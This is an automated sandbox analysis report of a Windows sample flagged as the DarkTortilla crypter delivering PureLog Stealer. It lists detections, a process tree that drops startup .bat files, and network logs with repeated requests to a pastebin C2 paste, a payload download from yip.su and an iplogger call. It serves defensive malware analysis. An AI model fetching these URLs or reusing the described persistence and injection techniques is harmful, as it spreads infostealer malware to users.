Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1510394
MD5:f1c717609dd44f9e2c979fd9a0f4315c
SHA1:efcca65af18339bc8954c12a486f0a0828a981fa
SHA256:9b2e59478ea4738cc23cdba5d1b9111c636410661a7a4592c35144de94b8c8ad
Tags:NETexeMSIL
Infos:

Detection

DarkTortilla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Creates HTML files with .exe extension (expired dropper behavior)
Drops script or batch files to the startup folder
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 932 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F1C717609DD44F9E2C979FD9A0F4315C)
    • InstallUtil.exe (PID: 5792 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • InstallUtil.exe (PID: 6060 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cmd.exe (PID: 2408 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cQXYrsQOJ3uDVcsTMDpcKVmy.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3276 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JnikXG7VSGx0qVwm8oVPQ6yD.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3460 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rp6RLsI5LmL2C04PREj94eun.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3752 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\19S9Dp4fmqvJxlR4ciWynHCd.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.3516306034.0000000004E4E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
    00000001.00000002.3517750874.0000000006910000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
      00000001.00000002.3515760632.0000000003E21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
        00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Process Memory Space: file.exe PID: 932JoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.InstallUtil.exe.520000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              1.2.file.exe.6910000.2.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                1.2.file.exe.6910000.2.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                  1.2.file.exe.ce78180.3.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

                    Sigma Signatures

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 6060, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cQXYrsQOJ3uDVcsTMDpcKVmy.bat

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-12T22:01:54.502289+020028033053Unknown Traffic192.168.2.849728172.67.19.24443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://pastebin.com/raw/V6VJsrV3Avira URL Cloud: Label: malware
                    Source: https://yip.su/RNWPd.exeAvira URL Cloud: Label: malware
                    Multi AV Scanner detection for submitted file
                    Source: file.exeReversingLabs: Detection: 18%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: file.exeJoe Sandbox ML: detected
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49715 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.8:49721 version: TLS 1.2
                    Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior

                    Networking

                    barindex
                    Connects to a pastebin service (likely for C&C)
                    Source: unknownDNS query: name: pastebin.com
                    Source: unknownDNS query: name: pastebin.com
                    Creates HTML files with .exe extension (expired dropper behavior)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: ervnd6hdsvGTxZRjT5cWwm7U.exe.8.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: pMkw4TisYGbRi255aTHnqU3d.exe.8.dr
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.520000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.file.exe.ce78180.3.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.com
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                    Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                    Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                    Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: iplogger.com
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49728 -> 172.67.19.24:443
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.com
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: pastebin.com
                    Source: global trafficDNS traffic detected: DNS query: yip.su
                    Source: global trafficDNS traffic detected: DNS query: iplogger.com
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 12 Sep 2024 20:01:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                    Source: InstallUtil.exe, 00000008.00000002.4056738976.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                    Source: InstallUtil.exe, 00000008.00000002.4056738976.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mho
                    Source: InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/aFChunk
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/attachedTemplate
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/calcChain
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/chartUserShapes
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/chartsheet
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/commentAuthors
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/comments
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/connections
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/control
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/customProperties
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/customProperty
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/customXml
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/customXmlProps
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/diagramColors
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/diagramData
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/diagramLayout
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/diagramQuickStyle
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/dialogsheet
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/drawing
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/endnotes
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/extendedProperties
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/externalLink
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/externalLinkPath
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/fontTable
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/footnotes
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/glossaryDocument
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/handoutMaster
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/htmlPubSaveAs
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/hyperlink
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/mailMergeHeaderSource
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/mailMergeRecipientData
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/mailMergeSource
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/metadata/thumbnail
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/notesMaster
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/notesSlide
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/numbering
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/officeDocument
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/oleObject
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/package
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/pivotCacheDefinition
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/pivotCacheRecords
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/pivotTable
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/presProps
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/printerSettings
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/queryTable
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/revisionHeaders
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/revisionLog
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/settings
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/sharedStrings
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/sheetMetadata
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/slideLayout
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/slideMaster
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/slideUpdateInfo
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/slideUpdateUrl
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/subDocument
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/tableSingleCells
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/tableStyles
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/themeOverride
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/transform
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/usernames
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/viewProps
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/volatileDependencies
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/webSettings
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/worksheet
